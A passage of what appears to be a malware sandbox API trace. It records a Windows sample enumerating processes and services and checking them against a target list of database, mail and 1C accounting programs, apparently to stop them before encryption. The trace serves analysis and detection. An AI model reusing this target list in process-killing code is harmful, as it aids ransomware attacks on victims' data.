lpString2="Schedule") returned 1 [0242.026] lstrlenW (lpString="SENS") returned 4 [0242.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0242.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0242.026] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0242.026] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0242.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0242.026] lstrlenW (lpString="ShellHWDetection") returned 16 [0242.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0242.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0242.026] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0242.026] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0242.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0242.026] lstrlenW (lpString="Spooler") returned 7 [0242.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0242.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0242.026] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0242.026] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0242.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0242.026] lstrlenW (lpString="Themes") returned 6 [0242.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0242.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0242.026] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0242.026] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0242.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0242.027] lstrlenW (lpString="UxSms") returned 5 [0242.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0242.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0242.027] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0242.027] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0242.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0242.027] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x4819790 | out: hHeap=0xb00000) returned 1 [0242.027] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x30c [0242.028] Process32FirstW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.028] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0242.028] lstrlenW (lpString="System") returned 6 [0242.028] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0242.028] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0242.028] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0242.028] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0242.028] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0242.028] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0242.028] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0242.028] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0242.029] lstrlenW (lpString="smss.exe") returned 8 [0242.029] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0242.029] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0242.029] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0242.029] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0242.029] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0242.029] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0242.029] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0242.029] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.029] lstrlenW (lpString="csrss.exe") returned 9 [0242.029] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0242.029] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0242.029] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0242.029] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0242.029] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0242.029] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0242.029] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0242.029] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0242.030] lstrlenW (lpString="wininit.exe") returned 11 [0242.030] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0242.030] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0242.030] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0242.030] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0242.030] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0242.030] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0242.030] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0242.030] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.030] lstrlenW (lpString="csrss.exe") returned 9 [0242.030] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0242.030] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0242.030] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0242.030] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0242.030] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0242.030] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0242.030] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0242.030] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0242.031] lstrlenW (lpString="winlogon.exe") returned 12 [0242.031] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0242.031] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0242.031] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0242.031] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0242.031] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0242.031] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0242.031] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0242.031] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0242.031] lstrlenW (lpString="services.exe") returned 12 [0242.031] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0242.031] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0242.031] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0242.031] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0242.031] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0242.031] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0242.031] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0242.031] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0242.032] lstrlenW (lpString="lsass.exe") returned 9 [0242.032] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0242.032] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0242.032] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0242.032] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0242.032] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0242.032] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0242.032] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0242.032] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0242.032] lstrlenW (lpString="lsm.exe") returned 7 [0242.032] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0242.032] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0242.032] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0242.032] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0242.032] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0242.032] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0242.032] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0242.033] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.033] lstrlenW (lpString="svchost.exe") returned 11 [0242.033] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0242.033] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0242.033] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0242.033] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0242.033] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0242.033] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0242.033] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0242.033] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.033] lstrlenW (lpString="svchost.exe") returned 11 [0242.033] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0242.033] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0242.033] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0242.033] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0242.033] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0242.033] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0242.034] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0242.034] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.034] lstrlenW (lpString="svchost.exe") returned 11 [0242.034] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0242.034] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0242.034] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0242.034] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0242.034] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0242.034] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0242.034] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0242.034] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0242.034] lstrlenW (lpString="LogonUI.exe") returned 11 [0242.034] lstrcmpiW (lpString1="1c8.exe", lpString2="LogonUI.exe") returned -1 [0242.034] lstrcmpiW (lpString1="1cv77.exe", lpString2="LogonUI.exe") returned -1 [0242.034] lstrcmpiW (lpString1="outlook.exe", lpString2="LogonUI.exe") returned 1 [0242.034] lstrcmpiW (lpString1="postgres.exe", lpString2="LogonUI.exe") returned 1 [0242.034] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="LogonUI.exe") returned 1 [0242.035] lstrcmpiW (lpString1="mysqld.exe", lpString2="LogonUI.exe") returned 1 [0242.035] lstrcmpiW (lpString1="sqlservr.exe", lpString2="LogonUI.exe") returned 1 [0242.035] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.035] lstrlenW (lpString="svchost.exe") returned 11 [0242.035] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0242.035] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0242.035] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0242.035] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0242.035] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0242.035] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0242.035] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0242.035] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.035] lstrlenW (lpString="svchost.exe") returned 11 [0242.035] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0242.035] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0242.035] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0242.035] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0242.035] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0242.036] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0242.036] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0242.036] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0242.036] lstrlenW (lpString="audiodg.exe") returned 11 [0242.036] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0242.036] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0242.036] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0242.036] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0242.036] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0242.036] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0242.036] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0242.036] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.037] lstrlenW (lpString="svchost.exe") returned 11 [0242.037] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0242.037] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0242.037] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.037] lstrlenW (lpString="svchost.exe") returned 11 [0242.037] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0242.037] lstrlenW (lpString="userinit.exe") returned 12 [0242.037] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0242.037] lstrlenW (lpString="dwm.exe") returned 7 [0242.038] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.038] lstrlenW (lpString="explorer.exe") returned 12 [0242.038] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0242.038] lstrlenW (lpString="spoolsv.exe") returned 11 [0242.038] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0242.038] lstrlenW (lpString="taskhost.exe") returned 12 [0242.038] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.039] lstrlenW (lpString="svchost.exe") returned 11 [0242.039] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0242.039] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0242.039] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0242.039] lstrlenW (lpString="reader_sl.exe") returned 13 [0242.039] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0242.039] lstrlenW (lpString="cmd.exe") returned 7 [0242.040] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0242.040] lstrlenW (lpString="conhost.exe") returned 11 [0242.040] Process32NextW (in: hSnapshot=0x30c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0242.040] CloseHandle (hObject=0x30c) returned 1 [0242.040] Sleep (dwMilliseconds=0x1f4) [0242.659] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea010 [0242.659] EnumServicesStatusExW (in: hSCManager=0x47ea010, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0242.660] GetLastError () returned 0xea [0242.660] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xacc) returned 0x3dee5b0 [0242.660] EnumServicesStatusExW (in: hSCManager=0x47ea010, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dee5b0, cbBufSize=0xacc, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dee5b0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0242.660] CloseServiceHandle (hSCObject=0x47ea010) returned 1 [0242.662] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0242.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0242.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0242.662] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0242.662] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0242.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0242.662] lstrlenW (lpString="AudioSrv") returned 8 [0242.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0242.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0242.662] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0242.662] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0242.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0242.662] lstrlenW (lpString="BFE") returned 3 [0242.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0242.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0242.662] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0242.662] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0242.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0242.662] lstrlenW (lpString="CscService") returned 10 [0242.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0242.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0242.662] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0242.662] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0242.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0242.662] lstrlenW (lpString="DcomLaunch") returned 10 [0242.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0242.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0242.663] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0242.663] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0242.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0242.663] lstrlenW (lpString="Dhcp") returned 4 [0242.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0242.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0242.663] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0242.663] lstrcmpiW (lpString1="mssqlserver", 